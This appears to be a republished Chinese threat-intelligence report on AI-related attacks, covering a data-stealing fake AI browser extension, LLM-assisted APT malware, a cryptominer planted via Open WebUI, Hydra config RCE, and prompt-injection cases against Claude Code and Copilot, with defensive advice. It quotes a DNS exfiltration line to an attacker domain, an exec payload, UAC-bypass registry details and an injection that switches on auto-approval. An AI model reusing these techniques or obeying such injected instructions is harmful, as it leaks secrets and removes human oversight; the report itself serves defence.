作为具备“数字管家”定位的工具，OpenClaw通常被授予较高权限，并保存着大量第三方平台的访问凭证。一旦实例未加防护地暴露在公网，便相当于为攻击者敞开了一条直达敏感数据的通道。O’Reilly网络安全社区的调研指出，目前可通过公开扫描访问的实例已超过1000个，其中至少300个完全缺乏身份认证机制。

2026年2月，OpenClaw的核心Skills分发渠道“ClawHub”被识别出了大规模恶意Skills的分发与植入，VirusTotal检测到数百个恶意的OpenClaw skills。原本作为扩展人工智能代理的生态系统，如今正迅速演变成一个新的供应链攻击面，攻击者在此通过伪装成自动化工具的方式分发后门程序、信息窃取器、远程访问工具等。下图是名为“hightower6eu”的攻击者在ClawHub传播大量恶意skills的截图。

攻击者传播大量恶意skills

还有一点需要指出，检索增强生成（Retrieval-Augmented Generation，RAG）通过引入外部知识库参与推理过程，显著提升了大语言模型在回答问题时的准确度与事实可靠性，因而逐渐成为主流的AI应用架构。但与此同时，对外部知识源的高度依赖也拓展了系统的攻击面，带来了新的安全隐患。克莱姆森大学的研究团队在EMNLP 2025发表的工作中提出了一种针对RAG系统的全新攻击思路AIP（Adversarial Instructional Prompt，对抗性指令提示），该方法具备隐蔽性强、效率高的特点。攻击者通过篡改和滥用在实际应用中被频繁复制、粘贴和共享的“指令提示”，在用户几乎无法察觉的情况下完成“投毒”，从而干扰RAG系统的检索过程并操控最终生成结果。实验结果显示，该攻击的成功率（ASR）高达95.23%，且不会明显影响应用的正常功能，使其极难被识别和阻断。这项研究警示，原本被视为可信并广泛传播的“最佳实践提示”，可能恰恰构成了RAG架构中最脆弱、最易被利用的关键环节。

纵观上述事件，我们可以清晰地看到一个共同特征：AI安全问题正在从单点漏洞演变为跨层级、跨角色、跨生命周期的系统性挑战。攻击者不再局限于直接对模型发起攻击，而是通过DDoS、配置失误、供应链投毒、Agent权限滥用、提示操纵、模型抽取，乃至硬件物理层干预等多种方式，构建起高度隐蔽且具备放大效应的攻击链条。更值得警惕的是，许多攻击并非源于“明显的安全缺陷”，而是隐藏在被广泛信任的设计假设之中，例如默认安全的内网组件、被视为最佳实践的提示模板、被赋予高权限的AI Agent，以及被认为难以触及的GPU显存与硬件层。这些假设一旦被打破，其造成的影响往往呈指数级扩散。

这些事件共同表明，AI已不再只是“需要被保护的算法资产”，而正在成为攻击的放大器、权限的集中点以及基础设施级风险的承载体。在AI进入深度应用阶段之后，安全防护的重点也必须同步转向体系化设计，从模型、数据、Agent、工具链到硬件与治理机制，构建真正面向AI时代的纵深防御体系，否则，类似的安全事件只会以更低成本、更高隐蔽性和更大破坏力反复出现。

第三章

典型案例分析

本章将引用几个典型的攻击案例，从对人工智能的攻击到使用人工智能辅助攻击的两个角度，重点探讨黑客在实施攻击过程中所采用的技术手段及背后的原理。通过这些案例，揭示攻击者背后的技术逻辑，阐明目前AI领域所面临的安全风险。

3.1 “精选”的AI窃听插件

浏览器扩展已成为大模型用户交互的重要入口，也因此成为攻击者的新目标。最近一款伪装成合法AI工具“AITOPIA”的Chrome扩展对超过60万用户实施了大规模的数据窃取活动。攻击者完全复刻了该合法扩展的UI界面和功能，甚至被Google商店标记为精选。

恶意扩展被评选为“精选”

同时攻击者利用Lovable来托管隐私政策和其他基础设施组件，来隐藏其活动，规避溯源。在权限获取上，诱导用户授予最高级别的内容读取权限，以便进行后续的数据窃取。

利用Lovable托管隐私政策和其他基础设施

通过对恶意扩展源码的分析，我们还原了其针对ChatGPT和DeepSeek的完整攻击链。该恶意软件滥用了浏览器 API 构建了一套自动化的窃密流程，主要分为初始化标记、全网监听、DOM窃取以及隐蔽回传四个阶段。

当扩展安装后，立即生成唯一的gptChatId作为受害者指纹，用于后续在C2服务端关联分散的会话数据。接着开启全网监听与筛选，恶意脚本调用chrome.tabs.onUpdated API 持续监听浏览器的标签页更新事件。它会无差别记录用户访问的所有URL及Google搜索关键词，一旦检测到URL中包含chatgpt或deepseek等特征字符串，即触发窃密模块，开始DOM窃取。针对命中特征的AI对话页面，脚本会注入特定的内容脚本（Content Script）。该脚本通过硬编码的CSS选择器（如[data-message-author-role="user"]）遍历页面DOM 树，精准提取用户的提问（Prompts）和AI的生成内容（Responses）。最后进行数据编码与回传，为规避流量监测，窃取的数据不会立即发送，而是先暂存至浏览器的LocalStorage中。后台脚本设置了30分钟的定时任务，周期性读取缓存数据，将其打包并进行Base64编码混淆，最终通过POST请求发送至C2服务器deepaichats[.]com。

窃取数据

为了防止用户卸载，做到持久化，攻击者设计了交叉感染机制：当检测到用户卸载其中一款恶意扩展时，代码会自动触发重定向，在新标签页强制弹出另一款同源恶意扩展的安装页面，诱导用户“替换”而非“清除”。

交叉感染重定向逻辑图

接下来是该恶意扩展的具体实现细节分析，首先通过检测“停止生成”按钮（如DeepSeek的.ds-flex._965abe9或ChatGpt的button[aria-label=’bad response’]）的出现与消失判断AI是否回答完毕。

检测人工智能按钮

一旦判断回答完毕，则通过CSS选择器提取文本内容：

提取文本内容

利用chrome.storage.local 作为跨脚本通信中转站。前线探针将数据写入 Storage，控制中心通过onChanged 事件来获取最新数据。

存储数据到本地

监听chrome.tabs.onUpdated和onActivated，记录用户访问的每一个URL：

存储访问的外部url记录

通过黑名单机制，过滤了浏览器内部的页面，只记录外部链接：

过滤浏览器内部url

仅仅对数据进行了Json序列化和Base64编码，没有做更多的加密和混淆。

对数据进行编码

每隔30分钟，将数据回传到C2服务器https://chatsaigpt.com/ext2/，内容包括用户的浏览历史和窃取的AI对话记录，以及用户的唯一标识ID（ChatId）。

回传数据到攻击者C2

上传成功后，立即销毁已缓存的数据，擦除窃取痕迹。

擦除缓存痕迹

3.2 APT 28使用生成式算法开发恶意软件

近期发现APT28使用大语言模型来生成最新恶意软件LameHug，这是一种用Python编写并使用PyInstaller打包为Windows可执行文件的恶意软件。黑客利用AI的推理能力来增强攻击的自动化程度和规避检测能力。通过使用盗取的官方邮箱账户发送具有高度欺骗性的钓鱼邮件，冒充政府相关部门，针对乌克兰国防安全部门展开攻击活动。

钓鱼邮件实例

与传统恶意软件硬编码攻击指令不同，LameHug并未在代码中预设死板的系统命令，而是集成了对Hugging Face API的调用能力。通过这一接口，LameHug能够连接到云端的Qwen 2.5-Coder-32B-Instruct大模型。在运行时，恶意软件将攻击者的自然语言意图发送给大模型，由大模型实时将其“翻译”为受害者系统可执行的具体指令。这种机制不仅极大地提高了攻击的灵活性，还使得流量特征和行为更加难以被传统安全规则捕获。

LameHug攻击流程

恶意软件在感染主机后，会建立与Hugging Face平台的连接，利用API发送精心构造的Prompt提示词。这些提示词包含了明确的战术意图，例如“收集当前系统的网络配置和硬件信息”。Qwen大模型接收到提示后，会根据其强大的代码生成和理解能力，返回具体的CMD系统命令或PowerShell脚本。

将查询命令Base64解码

查询命令Base64解码后的明文

在观察到的攻击样本中，AI生成的命令涵盖了广泛的系统侦察行为：其中包括创建隐藏目录用于存放窃取的数据，例如mkdir %PROGRAMDATA%\\info。利用wmic工具硬件侦察获取CPU名称、速度、内存容量、磁盘驱动器型号及大小等指纹信息。执行ipconfig /all 获取网络适配器详情，使用wmic nic获取MAC地址。运行tasklist和net start枚举当前运行的进程和服务。通过whoami /user和whoami /groups确认当前权限。

LameHug还会进一步扩展访问活动目录。通过生成的dsquery命令，恶意软件能够查询域内的用户、计算机、用户组、组织单位以及子网信息。这种利用AI动态生成复杂查询语句的能力，使得攻击者无需手动交互即可完成深度的内网态势感知。

所有命令的执行结果会重定向输出并保存至info.txt文件中。随后，恶意软件会进入数据窃取阶段。程序逻辑显示，它会递归扫描受害者的“文档”、“桌面”和“下载”文件夹，寻找具有高价值的文件，并通过SFTP或HTTP POS请求将这些数据回传至攻击者控制的基础设施。

此外，我们根据已发现的特征进行扩线，发现了其变体AI_generator_uncensored_Canvas_PRO_v0.9.exe和image.py。变体在功能实现上没有太大的变化，主要是数据外泄的协议和方式上略有差异。这表明APT28正在积极维护和迭代AI武器库，试图通过使用AI决策模块来对抗日益严密的端点防护系统。

3.3 APT 37利用大模型生成恶意Powershell

此次披露的攻击活动显示，以定向情报窃取和隐蔽渗透著称的APT37，目前将攻击范围扩展至包括日本、澳大利亚和印度在内的亚太地区，并将矛头对准了拥有区块链技术背景的软件开发人员和工程师团队。

此次活动的感染链展示了该组织典型的多阶段投递特征，但在诱饵和目标选择上有了显著变化。攻击者通过 Discord 等渠道散布钓鱼链接，诱导受害者下载恶意 ZIP 压缩包文件。为了增加可信度，压缩包内包含一个伪装成区块链项目文档的诱饵PDF文件和一个恶意的 Windows快捷方式.lnk文件。这些诱饵通常涉及区块链项目的架构、技术栈、开发时间表等专业内容，极易引起目标人群的兴趣和信任。

恶意附件内容

当受害者点击恶意的 LNK 文件时，会触发一个嵌入的 PowerShell 加载器。该加载器会从 LNK 文件中提取并解密两个隐藏的文件：一个用于迷惑用户的 DOCX 诱饵文档和一个 CAB 压缩包。DOCX 文档会被自动打开，以转移受害者的注意力。CAB 压缩包被解压后，释放出多个恶意组件,包括PowerShell后门、批处理脚本和用于绕过用户账户控制（UAC）的可执行文件。

基于LNK隧道与XOR解密的感染链全景图

攻击者使用字符数组索引的方式对脚本文件进行了混淆。该混淆的原理是在脚本中定义多个数组，数组中每个元素都是通过加减法计算出来的ASCII码，最后使用iex按照特定的索引从每个数组中提取字符串，拼成一个完整的执行命令。

经过混淆的Powershell脚本

去混淆后，发现这些脚本代码有明显的人工智能编写痕迹，例如代码整体设计精巧、清晰易懂的注释和功能划分，特别是描述$projectUUIDd的部分，这是典型的通过大语言模型生成的词汇。这种级别的注释通常是不会出现在黑客使用的工具中。

去混淆后的脚本

攻击者在此版本中引入了复杂的权限管理与反制机制，根据当前权限上下文动态调整攻击策略，若当前为普通用户权限，恶意软件会利用fodhelper.exe漏洞。通过修改注册表HKCU\\Software\\Classes\\.thm\\Shell\\Open\\command，将ms-settings协议重定向至攻击者控制的可执行文件rKXujm.exe。该程序执行后会静默修改ConsentPromptBehaviorAdmin注册表键值为0，从而彻底关闭管理员批准模式下的UAC弹窗。获得管理员权限后，脚本立即将C:\\ProgramData添加至Windows Defender的排除列表。若检测到SYSTEM权限，则直接部署合法的远程管理工具 SimpleHelp，建立长期、全功能的远程控制通道。

为了对抗流量分析，后门还内置了JavaScript引擎模拟器。它通过算法解决了C2服务器前端的AES加密问题，动态获取合法的__test会话Cookie。这使得恶意流量在WAF防火墙看来与普通浏览器的访问行为完全一致。

基于权限感知的动态攻击路径与防御规避逻辑

这次行动表明，现如今APT组织正在积极将AI技术整合到其网络武器开发流程中。这不仅降低了对复杂的恶意软件开发门槛，还使得攻击代码更加标准化和难以溯源。对于防御者而言，这意味着不仅要关注代码的恶意特征，还要关注代码的AI生成特征，并提高开发者社区的安全防护。

3.4 AI驱动的“影子”攻击

近期发生了一起针对用于增强LLM功能的自托管AI接口Open WebUI的攻击事件。该平台允许上传Tools Python脚本以扩展LLM能力。由于将训练的实例暴露在互联网上，且默认保留了管理员访问权限，没有设置身份验证。攻击者根据这一疏漏，使用自动化脚本向Open WebUI上传恶意Tool。在整个过程中，因为流量看起来像是合法的插件更新，所以绕过了常规的Web应用防火墙检测。一旦上传成功，Open WebUI便加载执行其中的Python代码，从而使攻击者获得了系统的控制权。恶意Python脚本表现出了显著的AI生成特征。在发送数据到Discord Webhook时，使用了大量的行内格式化字符串变量，这种编码习惯在人类编写的软件中较为罕见，但是在LLM生成的代码中却是很常见。代码还包含了细致的边缘情况处理、针对Linux和Windows进行平衡的跨平台逻辑、结构化的文档字符串格式。这些特征通常不仅不符合黑客追求代码精简的习惯，反而带有强烈的AI教科书式的风格。

该脚本功能全面，集成了多项恶意功能，包括T-Rex和XMRig用来下载和执行挖矿程序，构建processhider和argvhider隐藏进程，创建持久化服务以及通过Discord发送受害者信息。为了规避检测，脚本使用了PyObfuscator进行混淆，采用了多达64层的Base64反向编码嵌套，必须通过递归解码才能获取原始的Python明文。

AI生成的恶意python代码

攻击者在Linux环境下使用了一种更为独特的防御规避技术。脚本并未直接运行二进制文件，而是包含了两个C语言程序的源码，并在运行时即时编译为共享对象.so文件，通过LD_PRELOAD进行加载。其中一个工具命名为Processhider，该工具通过hook readdir和readdir64系统调用，硬编码过滤掉系统的进程名，从而使恶意挖矿进程在ls和ps等命令中不可见。另一个工具Argvhider使用了一个较为少见的技术，它不挂钩系统调用，而是通过挂钩main函数，通过glibc修改堆栈，使用memset将原始参数内存填充为0，从而在/proc/[pid]/cmdline中隐藏挖矿池地址和钱包ID等敏感参数。这种“自带源码、现场编译”的手法极大地提高了攻击的灵活性和隐蔽性，使基于静态签名的安全工具难以检测的到。

恶意so源码文件

在 Windows 环境下，恶意脚本释放了一个包含多个恶意组件的JAR包文件。该文件内含一个名为 app_bound_decryptor.dll的64位Windows动态链接库，负责XOR编解码和命名管道通信。另外，还采用了一种较新的沙箱检测技术，通过调用IsProcessorFeaturePresent(PF_FASTFAIL_AVAILABLE)，检查_fastfail()功能可不可用，因为大部分沙箱环境都不支持这个属性，攻击者利用这一差异判断当前代码是否运行在沙箱环境中，从而决定执不执行后续的窃密行为。此外，恶意代码还试图从Chrome扩展和Discord中窃取凭证和认证令牌，进一步扩大攻击影响。

Windows环境下的攻击流程

3.5 智能体与供应链攻防

3.5.1 模型配置文件投毒RCE

在AI模型供应链中，第三方配置库的安全性往往被忽视。近期披露的NVIDIA NeMo、Salesforce Uni2TS等多个流行AI Python库存在高危远程代码执行漏洞，其根源在于对配置管理工具Hydra的不当使用。

Hydra的核心功能之一是允许通过hydra.utils.instantiate()函数根据配置文件动态实例化Python对象。攻击者利用这一机制，通过构造恶意的YAML或JSON配置文件，将配置中的_target_字段指向Python的内置函数，并将恶意代码作为参数传递。

以NVIDIA NeMo为例，攻击者可以篡改模型文件，该文件本质上是一个包含model_config.yaml的TAR包。在恶意的YAML文件中，攻击者将target设置为builtins.exec，并在args中注入系统命令，如os.system("calc.exe")。

恶意YAML文件实例

当受害者调用restore_from等方法使用受影响的库加载模型时，在库的内部在解析配置时会毫无防备地执行这些内置函数，从而触发RCE。这种攻击方式隐蔽性极高，因为它利用了库本身的合法实例化特性，而非传统的反序列化漏洞。

利用Hydra实例化机制实现RCE的攻击流程

3.5.2 Claude Code白名单失效

AI编码助手Claude Code被曝存在一个严重的数据外泄漏洞CVE-2025-55284，该漏洞展示了如何利用AI Agent的内置工具进行侧信道攻击。由于Claude Code拥有执行文件读取、目录列表等操作的能力，并且维护了一个“自动批准”的工具白名单，其中包括了ping、nslookup等网络诊断命令。攻击者利用这一点，通过间接提示注入构建了一条完整的数据窃取链路。

首先，攻击者在开源项目的README.md或代码注释中植入恶意指令，首先读取.env文件，然后执行ping <文件内容> https://www.google.com/search?q=.attacker.com。当开发者让Claude Code分析该项目时，AI会解析指令并依次执行。首先读取包含敏感信息的.env文件。接着调用白名单中的ping命令，将读取到的敏感信息（如API Key）拼接到攻击者控制的域名中作为子域名发起DNS请求。攻击者通过监控其DNS服务器日志，即可获取敏感数据。这种攻击方式隐蔽性极强，因为它利用了合法的网络协议和AI的正常功能。

Claude Code利用DNS通道泄露数据的攻击流程

3.5.3 Copilot YOLO模式越狱

CVE-2025-53773漏洞揭示了GitHub Copilot的AI智能体被“越狱”后可能带来的灾难性后果。攻击者通过巧妙的提示注入，诱导AI修改其自身的安全配置，从而实现全自动的远程代码执行。

该攻击包含2个阶段，其核心是利用Copilot修改VS Code配置文件的能力，绕过安全限制。

（1）越狱阶段：攻击者通过提示注入，指示Copilot修改用户的~/.vscode/settings.json文件，将"chat.tools.autoApprove": true写入配置。这一步成功将Copilot置于“YOLO模式”，即执行终端命令不再需要用户点击确认。

（2）执行RCE阶段：在配置被修改后，后续的提示注入指令可以直接要求Copilot执行任意终端命令。由于自动批准已开启，命令会被立即执行，导致开发者环境完全沦陷，从而进行后续操作。

GitHub Copilot通过篡改配置实现RCE的两阶段攻击

第四章

安全与启示

结合前面提到的恶意扩展窃密、模型配置文件投毒以及智能体逻辑劫持等典型案例，可以发现AI安全风险已不再局限于算法层面的对抗，同时也深深嵌入到了应用交付、开发供应链以及人机交互的每一个环节。本章将严格参照现有安全态势，分别从终端用户与开发服务商的视角，剖析深层次的安全隐患。

4.1 用户端的安全风险

4.1.1 信任链断裂与数据透明化风险

从恶意Chrome扩展程序的案例可以看出，目前用户端正在面临信任链断裂的风险。在传统认知中，用户倾向于信任官方应用商店认证的“精选”应用或高评分工具。然而，攻击者通过复刻合法的AI应用界面，并利用“刷单”手段通过平台审核，构建了完美的社会工程学陷阱，导致了用户数据的“透明化”。与传统的破坏性病毒不同的是，此类AI恶意软件更倾向于隐蔽地窃取高价值数据。在大模型时代，用户与AI的对话往往包含极度私密的上下文，例如开发人员请求优化的核心代码，高层管理请求总结的会议纪要，以及财务人员输入的报表请求分析等。一旦这些数据被恶意插件截获，不仅意味着个人隐私的泄露，更可能导致企业核心知识产权的易手。此外，浏览器Cookie和Session Token的失窃，意味着攻击者可以无缝接管用户的数字身份，利用AI服务的高权限进行二次攻击。

4.1.2 认知操纵与防护滞后

用户面临的另一重风险是安全认知的滞后。例如普通用户往往只针对exe可执行文件进行了单层深度的警惕和防范，而对浏览器插件、PDF文档或看似无害的AI模型权重文件缺乏警惕。攻击者正是利用了这种认知偏差，通过看似辅助性的AI工具作为载体进行攻击和传播。此外，AI生成内容的逼真性也加剧了风险，攻击者利用大模型生成的钓鱼文案或伪造的隐私政策，极大地降低了用户的戒备心，使得利用社会工程学的攻击成功率呈指数级别上升。

4.2 开发者与服务商的安全风险

4.2.1 供应链深层投毒与环境沦陷

对于模型开发者而言，利用Hydra配置不当引发的漏洞揭示了目前针对供应链攻击已经进入了新的维度。传统安全扫描主要针对源代码或已知的二进制漏洞，而往往忽略如YAML、JSON等模型配置文件或序列化数据。这种风险的致命性在于其隐蔽性和自动化触发机制。当开发人员从开源社区下载一个热门的预训练模型进行微调时，仅仅是“加载模型”这一常规操作，就足以触发隐藏在配置文件中的恶意指令。这会导致开发者的工作站沦为攻击者的肉鸡，甚至成为攻击者渗透企业内网的跳板。由于AI开发环境通常配置有昂贵的GPU资源，网络权限较高，这类环境一旦失陷，将为攻击者提供强大的计算能力和横向移动的便利。

4.2.2 Agent混淆代理风险

随着AI应用向Agent模式发展，服务商面临着严峻的混淆代理风险。Claude Code的DNS外泄案例表明，赋予AI Agent文件读取、网络请求等自主调用工具的能力是一把双刃剑。在这种架构下，AI模型本身成为了攻击者的执行代理。攻击者无需直接入侵服务器，只需在AI处理的上下文中植入恶意自然语言指令，即可操纵AI执行违背设计初衷的操作。例如向GitHub仓库中的README文件写入提示注入。这种攻击穿透了传统的防火墙和WAF，因为所有的恶意操作都是由合法的进程在内网发起的。对于服务商而言，这意味着传统的边界防御正在逐渐失效，如何管控AI的意图成为全新的挑战。

4.2.3 基础设施的侧信道泄露

案例中利用DNS请求外带敏感数据的手段，暴露了基础设施层面的侧信道风险。AI服务通常需要访问互联网以获取最新信息或安装依赖，攻击者利用了这一特性，将敏感数据放到看似正常的网络协议中进行传输。这种低频且隐蔽的数据外泄方式难以被流量监控系统识别，使得企业的API密钥、数据库凭证等核心资产面临长期、持续的泄露风险。

4.3 启示

上述安全事件为整个AI产业敲响了警钟。面对日益复杂的攻击手段，需要从技术架构、流程管理到人员意识建立全新的纵深防御体系。

4.3.1 重构AI供应链的信任机制

摒弃隐式信任，建立零信任加载机制。开发者必须认识到，开源模型和第三方库本质上是不可信的外部输入。安全格式迁移，加速淘汰Pickle等存在反序列化风险的模型存储格式，全面转向Safetensors，仅存储张量数据，不包含可执行代码的安全格式。严格的输入清洗，对于YAML、JSON等配置文件，在解析前必须进行严格的白名单校验，禁止动态实例化任意类，仅允许加载预定义的安全类列表。做到沙箱隔离，所有外部模型的加载和微调任务，都应在网络隔离、受限的沙箱或容器环境中运行，切断其访问宿主机敏感文件和内网服务的路径。

4.3.2 建立Agent的权限围栏

AI Agent的自主性必须要划分一个标准的安全范围。严禁赋予AI Agent无限制的系统访问权限，对于必须使用的工具，应限制其参数范围和目标地址。采用人机协同验证，对于涉及敏感数据读取、代码修改或对外网络连接的高危操作，必须强制实施人工审批流程。不能为了追求自动化效率而牺牲安全性，如案例中的自动批准机制应被严格禁止或仅限低风险操作。监控输出与行为，建立针对Agent的实时行为审计系统，监测其是否访问了非预期的文件或产生了异常的网络请求。

4.3.3 强化应用分发与运行时保护

针对用户端的恶意应用，平台方和企业IT部门需承担更多责任。建立应用签名与验证机制，企业应建立软件安装白名单，仅允许运行经过数字签名和安全审计的AI工具。在浏览器和终端侧部署EDR或专门的AI安全插件，实时检测网页是否存在异常的DOM抓取行为，或拦截未经授权的跨域数据传输。

4.3.4 安全意识的现代化升级

最后，安全意识教育需要与时俱进。警惕AI幻觉与欺诈，AI生成的推荐、链接或代码并非绝对安全，可能包含攻击者植入的恶意诱导。采用数据分类分级制度，引导用户避免将核心机密数据输入到公共AI服务中，对于敏感业务，应使用私有化部署或经过企业合规认证的AI工具。

第五章

总结

过去一年的安全态势清晰表明，攻击者已成功将人工智能的认知能力系统性地转化为实战破坏力。从模型服务接口的滥用，到智能体框架的恶意编排，攻击面已从传统的IT边界深度渗透至业务逻辑乃至决策中枢。事实证明，攻击者利用AI实现的已远非简单的自动化脚本，而是形成了覆盖侦察、诱骗、执行全链路的“智能攻击闭环”。在这一过程中，基于RAG的知识检索、插件系统的权限传递，以及“人在环中”的交互机制，均可能成为新的突破口。面对这一现实，我们必须清醒认识到：AI驱动的威胁已全面走出实验室阶段。未来的防御体系必须从被动的漏洞修补，转向对AI行为逻辑、上下文意图及整个技术生态完整性的全景监控与动态拦截。随着AI与网络安全的交织更加紧密，攻防对抗也将向更深层次演进，因此对于2026年的攻防趋势，我们从四个方面进行简要分析：

攻击侧：智能化渗透与“隐匿化”攻击将成常态

预计攻击将更深度结合大模型的环境感知与策略生成能力，实现自适应渗透路径规划。AI可能被用于自动生成针对性漏洞利用代码，并动态绕过检测规则。攻击行为的“低可见性”将进一步提升，模拟正常用户或系统行为的技术趋于成熟。

防御侧：行为分析与意图识别成为关键能力

基于规则的静态防御将进一步失效，防御体系将向“AI对抗AI”的实时博弈模式演进。重点将转向对AI调用序列、上下文逻辑链、权限流转异常等行为特征的动态分析，并构建跨模型、跨系统的协同防御生态。

生态侧：供应链与开源组件风险加剧

随着AI开发工具链、预训练模型、Agent框架的广泛采用，针对AI供应链的投毒攻击和漏洞利用攻击可能大幅增加。开源模型、公共数据集和插件市场或成为攻击者新的关注焦点。

监管与合规推动安全范式演进

伴随AI安全立法与行业标准逐步落地，可解释性、审计追踪、伦理对齐等技术需求将更紧密融入开发生命周期。“安全即设计”和“合规即防御”的理念将在企业架构中进一步体现。

声明：本文来自ADLab，版权归作者所有。文章内容仅代表作者独立观点，不代表安全内参立场，转载目的在于传递更多信息。如有侵权，请联系 anquanneican@163.com。

智能之刃：近一年AI安全威胁演变与攻防新格局

AI Agent生态新威胁：Skills武器化与完整攻击链解析

MAGIC：基于掩码图表示学习的高级持续性威胁检测

Fuzz4All：基于大语言模型的通用模糊测试